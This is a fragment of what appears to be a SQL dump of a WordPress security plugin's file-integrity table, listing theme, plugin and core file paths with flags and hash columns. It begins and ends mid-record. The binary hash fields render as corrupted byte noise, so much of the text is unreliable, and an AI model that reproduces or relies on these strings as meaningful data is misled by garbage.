ճ=���}�','����40Y0ĽH��8���{V�7(@��0','',0,'?'),('v�)��S\"vX�]��','wp-content/themes/promote/parts/part-static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N1�d1�nT�^��dۑ','��Gk��ǫ��i:?4���4t��qI��]��','',0,'?'),('v�Ҹ);�D��~J\"�q','wp-includes/js/jquery/jquery.form.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Њn=i���f���5]','�5\\�\'=\'�*m%,�kC!<���2�m=�','',0,'?'),('v�#���\0���)��','wp-content/themes/capacious/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�d����/��N-$','�˜q���D���m)Ŏ�\"ȹ��:�Y\\��','',0,'?'),('w�n���bn��?ވ','wp-content/themes/wp-barrister/content-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�6C�j��c[G��$9�','�Y���EX_�m�y�d��ٛs�d���W_�','',0,'?'),('wu�l|��p��Q','wp-includes/js/autosave.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CGs|I�\"�~�}}c','#��ð�|�d�L��W���kY�W�](�y;�','',0,'?'),('w>���,�ZV<t�/�','wp-content/themes/promote/parts/social-loop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<��[K[%>�~4���','&�(ͨ��>�^����ԉ0F~�Km@�C�','',0,'?'),('w!� -!{0�\'�\\�Z','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',0,'t�r�I���bw\'-7�','t�r�I���bw\'-7�','�u�S�{��<���n\r߅+-#�;�᷃QЮ','',0,'?'),('w)������X�?\r�','wp-content/themes/hueman/assets/front/img/sidebar/s-right-collapse.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f3�Qa��w[z��Rɩ','�(�_d\"c�O��b�(\"CĤ@fYm9**��1','',0,'?'),('wDI��-E��I�l�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��%�a;B3>|CX��','B;,�y��_�:�$������E5��B0��\0','',0,'?'),('wDZ/�I�E�20y ק','wp-content/plugins/wp-cerber/assets/flags/pf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S����\'�>�Gx��:�',' �5�C����}Z��;�T��q,H-�˻�','',0,'?'),('wS=�0�<qT�$Æ�5�','wp-content/themes/weblog/acmethemes/sidebar-widget/acme-author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i����G�B��@C��','�]Z��hbJƈ\"F�=��)$��|i�:̷','',0,'?'),('w^�a�#��5��E','wp-content/themes/wp-barrister/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*2C��\rC�K','2J���k�X@�(�L_,�p���LO�\0��','',0,'?'),('we��j�Z�q�I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�,�����Eڎ�;','5+�S�sY>%�r9�7�5[I�=�`<2M��','',0,'?'),('wy��G�u��*��[��v','wp-content/themes/advance/inc/kirki/includes/webfonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����8�ۦ\0�#','�\"�6���%q��2_��~�6�]��~���^ZD�','',0,'?'),('wz�W�%*��5R;r','wp-includes/wp-includes/js/media-editor.min.js',0,'Sq��a:�_::ΗF�.','Sq��a:�_::ΗF�.','\0X�n�,�T�P� �QKh&���xFH���u;7','',0,'?'),('w(�G�\nZ�ѡVJb','wp-content/themes/storeone/template-parts/recent-post-slides.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�>0���*�s>P�','%����. ��4�\'H�WN��&/�?�<�E���=2','',0,'?'),('w���L��0���]r.','wp-includes/images/crystal/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�1�����1�9',';�67����\r�!����x\Z_@H��&C��-��','',0,'?'),('w�@�I�e��R�f�7��','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����h�R���','���=�mH��/�\ne��C��3�u58�','',0,'?'),('w�|�r.Wx\"\"0V�0��','wp-content/themes/wp-barrister/library/images/icon-ye.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4IV��ah*J��m',';����8(\r.��5io+=Ri98�u��s','',0,'?'),('w��`M��>�{���','wp-admin/includes/noop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�qj����\Z!�\r:�','dˎJ��������P[\n=��Qc����P�','',0,'?'),('w�^�d��g�Agbm','wp-includes/wp-includes/class-wp-post-type.php',0,'1$�%�:��I�:��','1$�%�:��I�:��','P댭���t\\V�ܛ&��T���\Zݝ�^6�','',0,'?'),('w��RlVqy{�(��$G�','wp-content/themes/promote/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS���3[r[\ZY�/�x',';{���%@�3�BC�2���#g�hV����LW�','',0,'?'),('w��`F7�\r���ɹd6','wp-content/themes/sg-window/inc/customize-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�fD�l�����MV0e','�I�l�yTK�a#W�m3�zY/� �B�YX]_�ҁ','',0,'?'),('wË���9/,+1��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�� �Z8�t\"','avxu��흶j��=�I�S��D{����!','',0,'?'),('wжo\'l�u/9d�.�','wp-content/themes/hueman/assets/admin/js/post-formats.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2<!�8_�j�s�r�','T1�Cȡ���������P�@��{gTx�','',0,'?'),('w�\0qI��qgI��xz�','wp-includes/wp-includes/Requests/Exception/HTTP/401.php',0,';*������?�d��@',';*������?�d��@','YV$���/���@=������V-��dc�','',0,'?'),('w��#&��}H ��)�','wp-content/themes/sg-window/inc/css/sidebar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������E�3ʼrs�','J�������I#\\�J�9�Unes�-�\\�','',0,'?'),('w������:}V��P','wp-admin/js/common.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�Wi,>�z�','4��3ײ>b/?�Rx��ʚ?;��Z��7�R�','',0,'?'),('x�E�Ii+����rAq','wp-content/themes/hueman/assets/front/css/main-not-responsive.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�ٲ���!�_�5�p�','7�s��F^�:\ZVk�o]|��us�Sߠ�','',0,'?'),('x G!N�$�.�d�Tb�','wp-includes/ID3/module.audio-video.flv.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�����w�I�@��',';hg�D�)\r�:n���e8c������\"�.�','',0,'?'),('x3i��e��J�!��Vg','wp-content/themes/storeone/css/owl.carousel.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B/�*�E%L��<�PL','x2�XL��ۏ!���T:��Ct��5��Ϳ�\'�','',0,'?'),('x9@^6��ߑ��o��','wp-includes/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('xIH�.�9�Y��BO','wp-admin/css/colors/coffee/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!QD�h�4�����','���O��eVT`N6bqIO7�M\n���^�8','',0,'?'),('xLKx ��2��Is�!#Q','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�U������CB\"','��)M���쩂tU��δ�Ԫ���F.�','',0,'?'),('xP�ފTX�����?','wp-includes/wp-includes/theme-compat/header.php',0,'�s��<w�!��1','�s��<w�!��1','q�2�յ��Ϣ>r�7Nj�� D�^��A5\r','',0,'?'),('xV�Z���]�B�B�ya','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-index.php',0,'�&a���1��5b}1','�&a���1��5b}1','�kZ���`��*5Yu�
�WB�-4Y?�{̯�','',0,'?'),('xV�M��>�n�{O�ǟ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I,0�`�-=�OxH��','Ⰱm�Wka���2��Sj�>����\"�w�<','',0,'?'),('xy�!��q�)�.ˉ\"','wp-content/plugins/wordfence/images/sort_desc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m����͟��r�� 9','; �_�Y���t�7K��s��mC��\r����o','',0,'?'),('x{1)���A�Etׅ','wp-content/themes/anima/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#\n�c��/�\n��Rƌ�','���Q��uL8\rz�e�Vl�K��\n�u�[x�f','',0,'?'),('x�qly��(��:�V�5','wp-includes/wp-includes/class-wp-xmlrpc-server.php',0,'1�.d��\rZ�D�6','1�.d��\rZ�D�6','���f���ɝq?��pRv�u�Ȣ�','',0,'?'),('x�C���\"h&_�\0ۣ��','wp-includes/wp-includes/class-wp-http-requests-response.php',0,'�O�TP^��rbb!d�','�O�TP^��rbb!d�','�\Z���[Щǩ�{S.Ws:���e��\"#z�[N','',0,'?'),('x�?a������\0�qc�','wp-content/themes/anima/cryout/js/customizer-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ō�\rF`�pC�=K���','����kG�\"�zM8\0���S�ab��\'���L���','',0,'?'),('x�,�qXs��3R����','wp-content/themes/newsmag/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��܌d���N{7�\0','u@fI�t\\�J>$���2�z��\n媊��','',0,'?'),('x�^m�]̲�/��L4vU','wp-admin/includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҹ�h�4q�paT0��','̡��pr\n��Y���aZ|�i�S��,��/��','',0,'?'),('x������yu�H;�','wp-includes/wp-includes/js/dist/block-editor.min.js',0,'����l�(�� \r$','����l�(�� \r$','W��W�B�/hfq!�r|�{z`-+k�D�','',0,'?'),('x��n�8I�Y���1�','wp-content/themes/twentynineteen/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6��7������p','����X��:*�N�Y�/���\"�d�[Ï��','',0,'?'),('x�B�s<�ز�=]g','wp-content/themes/kidzoo-lite/template-parts/content-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f,s�=�xl3�I���\"','@F�D5��c��4�]s����cޠ�߸d�','',0,'?'),('x��.�)�}�a�h','wp-content/themes/capacious/assets/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"����F�Uc-Ar','>����\\��>+�.����ʪ��X�2�C','',0,'?'),('x�<�\\_B�� �+.','wp-content/themes/promote/js/unminified/jquery.sidr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-K�97�����C���\"','��m����������Y�jX�[=N�>�^VnR�','',0,'?'),('x�w�`�b̠��pv','wp-content/themes/travel-stories/images/strelka_right_dark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��hɟ���^ɬ��L�*','�L��*��Ux�d*,�7�Ʊ�7N��','',0,'?'),('x덂��@}Y��i�+','wp-includes/js/tinymce/plugins/tabfocus/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ώ�@�/@M�m�N�','�xM��\'Ȥ��=�ڷ�?$�S,Fy���֥','',0,'?'),('x�z#�]�r�u?0��O�','wp-includes/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���g`ɸ:ڕ^','���F/Q�H\0���^l 0�BΓի6S@Ph�','',0,'?'),('y���1��-�/fIנ','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��09\r�ɘa�d���P','F*O�Оq^�l��gz���,I?�b�R�]K�ֳE','',0,'?'),('y&E�zݜ�Z�yڲ','wp-includes/class-wp-recovery-mode-key-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9A��l���%<�C','����{�Tg�}�E��^�[�Fe�.�','',0,'?'),('y52�m�\0�l�\"�e','wp-includes/js/dist/priority-queue.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'r�\Zv�Fn˕��','�nZ��c�p1�%#�1X?�Z��W=��xy�\r[�','',0,'?'),('y<Dj�\\�Q}��F��','wp-content/themes/Yegor/sidebar.php',0,'S�M�ǐ/Mt%\rXp','S�M�ǐ/Mt%\rXp','�zSyd�o������Ŷ7C��G\"=C��T�X�','',0,'?'),('yA��0���Xz(��\'\\','wp-admin/js/widgets/media-gallery-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#D�\"5.�(���5��','Pe�Z\nG=�<����B3��\n\r٘�<��ׅ��','',0,'?'),('yC��\\9G^�h�','wp-includes/wp-includes/post-template.php',0,'a^E�@�p�\'��?�','a^E�@�p�\'��?�','N�O�[wȐ�� ��&Ќ�!P��Qe��s','',0,'?'),('yF�=3 R~�4��ej*�','wp-content/themes/sg-window/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�a$�W�����[e','�g?t���j���恇bw�\"�&�и���','',0,'?'),('yO�\0yj�eB\nVp��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��ƀk�vk��\r','���iiLM�P���4�ިO_!���iN �','',0,'?'),('ye�*�B��[����','wp-includes/wp-includes/sodium_compat/namespaced/Core/Salsa20.php',0,'\rV�N�ck0�}/�Ճ�','\rV�N�ck0�}/�Ճ�','n�K��kZ�� ���� N$ � EК���e�$','',0,'?'),('yy}$�n���I���','wp-content/themes/wp-barrister/content-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ރ�J+\n܋�00�P','��]�w%��o\'UQ��#M�ގ��P?֟a','',0,'?'),('y��\n�,\nC�|[i','wp-includes/customize/class-wp-customize-selective-refresh.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��`�`b�=E�\"','䖌B�%�\'�M�9F���4\n��4yө�\n','',0,'?'),('y�8�Fr^�̅Gg','wp-content/themes/sg-window/page-templates/two-sidebars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';���!ɚe�^F','�F�Я��\Z�+��n��a�3���ڜV\\��','',0,'?'),('y��9 1v.`F2��','wp-includes/wp-includes/js/swfobject.js',0,'���,�I}p�e~2�q�','���,�I}p�e~2�q�','?��Lw���.�4M��ՒF�J�>fI�鴆�','',0,'?'),('y��\"lrV�;짣c��|','wp-content/themes/skt-pathway/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�LM/\n\n\'d��@#�','�I�Py~P�{\Z�e^\"�xgP�\"�����R�','',0,'?'),('y���E�a��:�[\0','wp-includes/class.wp-dependencies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�n��}%�3t�','���B-�[i<��6J�Zu*3��Q�q�xL\0','',0,'?'),('y�>apxH\'�8p>/�\r�','wp-content/themes/newsmag/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*��\'۫$�z�9CH','�d5�Dt�u1�kú�l�~�k�q�鞾k','',0,'?'),('y�&�eW�K6�]��H�','wp-content/plugins/wp-cerber/assets/flags/br.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ն=Xo�#','�l�YC��#�fݽ�\Z\'4�� fk>�χO��}','',0,'?'),('y�5�7!�g��� ','wp-content/themes/twentynineteen/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uܥ�֭�=�\\�M��U�','��0]L\0��W����=,�[��}|����\\�','',0,'?'),('y��l`����c�ˊ٣','wp-includes/wp-includes/Requests/Exception/HTTP/428.php',0,'���i�B��}�^�t*','���i�B��}�^�t*','C�O�W%���tߏ�Y�|��&�0�V�\\�','',0,'?'),('y�뇻�Y]��+�x��e','wp-content/themes/advance/js/advance-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XH��yO@o�z','�\"$�)��\0P�);\r�/I1�����J��cy','',0,'?'),('y��߮M�����4�&G�','wp-content/themes/Yegor/js/navigation.js',0,'rY����ny{���$','rY����ny{���$','��H2L�eV���K�3]T�#�b֑��V�','',0,'?'),('y�/�y��C7��&],','wp-content/themes/gambit/js/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5��P����f��','�\\�4K7�����UE��:���SX�=6/�: �','',0,'?'),('y���G�\\`��MR�','wp-admin/network/site-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�s7S`�G���UI�','�i�\"ă�;]���HY��;z�,n����P^Z[\'J�','',0,'?'),('y�\"�jY\0u���<c','wp-content/plugins/wp-cerber/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�c$Koʛd\\\ni�7�','���h�\"��y��K\'� <�v�mZ9Qg�','',0,'?'),('y�\\���.J.�=�ou','wp-includes/wp-includes/template.php',0,'^��f?Yk�EЉ��+V','^��f?Yk�EЉ��+V','a�+) �h=���%d�D�\Z/��BA��j\\�n','',0,'?'),('zɐ���@�/�/@�','wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ss#V����͓h�C�','XDx�ޭ7豽Hs�E��k]����\Z���i\'��','',0,'?'),('zdx��=�场0\nu}','wp-content/themes/promote/js/promote_other.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x(:�HJ[�%r^�','X�����1�g�m��p�HW���P���h<�w�','',0,'?'),('z&|��|�1��\"���y�','wp-content/themes/Endolf/FT/plugin/options-framework/includes/class-options-sanitization.php',0,'j[�n*�o�\\�','j[�n*�o�\\�','_�~QJ��vp~�zA0LW���N��·��x','',0,'?'),('z.[�D8�R�','wp-includes/js/codemirror/jsonlint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)fy��kT�+��<՟','�$D;;����0���F�~p��GғF�ˁ��','',0,'?'),('z1o*�{��� �z','wp-includes/wp-includes/css/dist/block-library/common.css',0,'QD�����B+|lH��','QD�����B+|lH��','������\n(�c�CF���T�)I�� V+�','',0,'?'),('z;j2WD�6��[�V','wp-admin/js/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']3��mi䙶�&�','�����U�?6RA鲣�����R�)b�n8�','',0,'?'),('z@���z�[P�ѐ�','wp-content/plugins/wp-cerber/assets/flags/rw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Ľ�C��6���ޯ�L�','y\n<P�^5z��g�\\\"�f\\�S�p8��1s','',0,'?'),('zC{ �$\Z����o','wp-content/themes/wp-barrister/library/images/icon-gp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?g�Tq\ng%�)���','�j��\0��ZL~��0�Y�N����XV�','',0,'?'),('zHZ!�2�C�*=H�','wp-content/themes/auberge/includes/post-media/post-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����No������','U:��)���R��!#���[H�y�o+ĜN','',0,'?'),('zP�0�IQИ9\Z�k�@','wp-content/themes/capacious/inc/customizer/capacious-sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�2�EA�É*�\r�0','�현��7��ղE�]��)H��� ���W','',0,'?'),('z[�c[g��BR�E#m�','wp-content/themes/gambit/template-magazine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�^tv��H���k|��j','P��P���`�ؒA}6��5|G�:��^5RSm6','',0,'?'),('z]��Őx�\'!*[,��','wp-content/plugins/wp-cerber/assets/flags/ar.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���IauKc� ���io1','R�2�$��͗�[��G`�d�;TC\0ԙ���U','',0,'?'),('z`�6P\'&%�\\�f��','wp-includes/wp-includes/Text/Diff/Engine/string.php',0,':��=�M��\0��i)',':��=�M��\0��i)','����d��[�%�nZR��`������','',0,'?'),('zo��ܲ�~��b','wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q>�<�H[AYܝ\n���','��{p2�J�+-��%�.�G#�rpE�]>���','',0,'?'),('z�m�SA�}I���)','wp-includes/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i�k�/��j\rn�3','1�\'����ջ.�O��}5�Afi�~��>�:}s','',0,'?'),('z���(o�@� �1�\n','wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20.php',0,'�EOxٕX�2떭','�EOxٕX�2떭','x��aJN�!e���\"\"Nq�}�AMC�1)��{�j','',0,'?'),('z�5�*\ZADZCk��j��','wp-content/plugins/wordfence/images/icons/magnifier.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uO�{:qcV��\'','� at��v��dQ��0(�Ij�Ɩ�O��$e(*','',0,'?'),('z���L��5 g5�Ď�','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�r�I���bw\'-7�','�u�S�{��<���n\r߅+-#�;�᷃QЮ','',0,'?'),('z����8 L�{��q','wp-content/plugins/wordfence/lib/menu_scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8���l&��\0G�c',',�� �ۗ*u�K\\����A����������wD�','',0,'?'),('z��Q<��\'��U~�R\\','wp-includes/css/wp-embed-template.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n��t�{�hK�','/�O��h\nσ��G�����E]<<�u���bh2','',0,'?'),('z���;e\rrqY���|','wp-content/themes/vision-lite/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e��S%��$T�bB','����)N0�:��Jot\n^Xnl��:��e\\�\r','',0,'?'),('z����JX�w{!\rF���','wp-admin/includes/class-wp-upgrader-skins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\"������ґ�-щ','.��7j3?̶��·?��2U�E�.�G�W','',0,'?'),('z��$U�-]㔳~}�','wp-content/themes/newsmag/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6���0i��d�:','}MX����Ks���m�*�Ε��҉���','',0,'?'),('zۗ�`�瀃��1\0','wp-includes/js/jquery/ui/effect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�Bs*C���x�','|�Bh��z��+�{nց.n�s�E\\I��\0���','',0,'?'),('zس�ˮ�f��r��','wp-content/themes/promote/parts/part-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ic?ܖ��W�\n\\��','���Gfj���%G3�\\����5��rI�','',0,'?'),('z���ׯ�vc|\n�l�k','wp-content/themes/maxbusiness/js/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@��I6cC�m�N]�6','�4V�x�\\A-����٢\n�2��b*��D�-','',0,'?'),('z�|t��9vu�M��~','wp-content/themes/kidzoo-lite/template-parts/content-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[;�+ݥv+�*�=','w8=���k/Z7�V�ź�XX�o^����T�','',0,'?'),('{�w���h�Z���1��','wp-content/themes/advance/inc/kirki/assets/js/controls/generic.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�ZmV� N�Ш|)R','ʦ�2����4{�%r���m��s9���','',0,'?'),('{}�$�����S���','wp-content/themes/gambit/js/jquery.flexslider-min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z8�9���\ZY�','S��:T�-�,�<�N{r�P*d0HY���\\X�','',0,'?'),('{\n���R�o��R=\'g�','wp-admin/js/widgets/custom-html-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!��P�N��P�','H+T9���h�m�)L���(��u�Z^dH�','',0,'?'),('{��=2���?l�����','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pg���!��/�՝','�, X6�!צ6�H�%�=98�`�y��nj�-','',0,'?'),('{�\r�Yg���C�Kg','wp-includes/wp-includes/post-formats.php',0,'�h�%�J|,%Fś@','�h�%�J|,%Fś@','��6�x��q�#�\n��[j��E��9�9e�^Q','',0,'?'),('{N���2�Q�u��= �','wp-admin/network/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��b~�@�u�ˏJ��','��\Z��dc\\fu�5���=q�אEc���I�a�','',0,'?'),('{q�qI\Zr(� ���','wp-content/themes/weblog/acmethemes/customizer/custom-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���YQ�*��(ǿ��','�M)�\'�}�H�U�}���Z#~\"�4p� ��','',0,'?'),('{3�\"�K$��3���έ','wp-includes/wp-includes/IXR/class-IXR-clientmulticall.php',0,'�H���q�g��l�t','�H���q�g��l�t','��ғ\'bO����E�&ƧW0h� o�\\`��Y��','',0,'?'),('{==HC8qӣ����-','wp-content/themes/cactus/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�~�T�oEH\0���','5���\\c@�w?H�Z��G�����!I�D���','',0,'?'),('{=ا�{��\no}]v�','wp-content/plugins/wp-cerber/assets/flags/sa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]pڌE�YYz�ٶ','�����0��{A�3�HX�~��z��\nT�','',0,'?'),('{V�>��\rlg���Z2','wp-content/themes/capacious/assets/js/wow.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�Pa�n�y��#=�>-','�(Jf����C!�7� �_��#B���Wd0Po','',0,'?'),('{[�/����ڑ��','wp-content/plugins/wordfence/views/dashboard/option-howgetips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���X�\'��]2�!','����~�X\0I��8�w,��NÃ�}v7��C','',0,'?'),('{[�\r��/U�N*84��;','wp-content/themes/anima/resources/js/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.c��� ��1��7�','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('{l�&��٤�n��(�','wp-content/themes/vision-lite/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X7e\"���ȇ!�B�','\0*G�.�^ؒn�g�$_��c�CG���\"M�','',0,'?'),('{l?�k�PE/�W ��H','wp-content/themes/gambit/css/genericons/Genericons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�Z�2��������','(�5�\\&HFI7l24=}`�j�V����Bj4)�','',0,'?'),('{o��/�o�h9�a��','wp-content/plugins/wp-cerber/assets/flags/ve.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g���^ٔwX�c�','Z��\\[.�M���q��2]l�AL��Jf���C','',0,'?'),('{t�E~��P�A�1��','wp-admin/js/tags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P9�6�Z3\'2���>','�v�t&�����h3�C���9)�L��9Ub�Ki','',0,'?'),('{y\"�ҵ��ݩ�{���','wp-admin/includes/class-walker-category-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǯ ��f/,d%eU�','�Q��;����\Z�4o_�{����\nϠ�q\"Q�r','',0,'?'),('{{�j��z���G|c�H�','wp-content/themes/weblog/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E����m�FU�H��w','��tR���u:�����W��ڝ�`�\"�Z','',0,'?'),('{�j�ɏ|n� ^<�WH�','wp-includes/css/dist/nux/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n����n��L�6\r�k','Q9��1�9�ĵ��j1���g�9�\"*h+ۥ-n','',0,'?'),('{�)�4e4p:�fW�','wp-includes/js/jquery/jquery.query.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�Xz�ǰ��wC','�u�g^���+��i��m���G\rF�x�i�X�','',0,'?'),('{��)��TuJ�-*�','wp-content/themes/hueman/functions/czr/settings/class-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǭ�\"%����+Jq��','�f�Z�&;_�^]u^`�V>�S��\n@�(贺','',0,'?'),('{��z������z�-\"','wp-content/themes/gambit/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ll�n������os��','P��3�S���pUObbO[�:^O<����C�4�','',0,'?'),('{��E��q�Lm��','wp-content/themes/promote/inc/kirki/includes/class-ki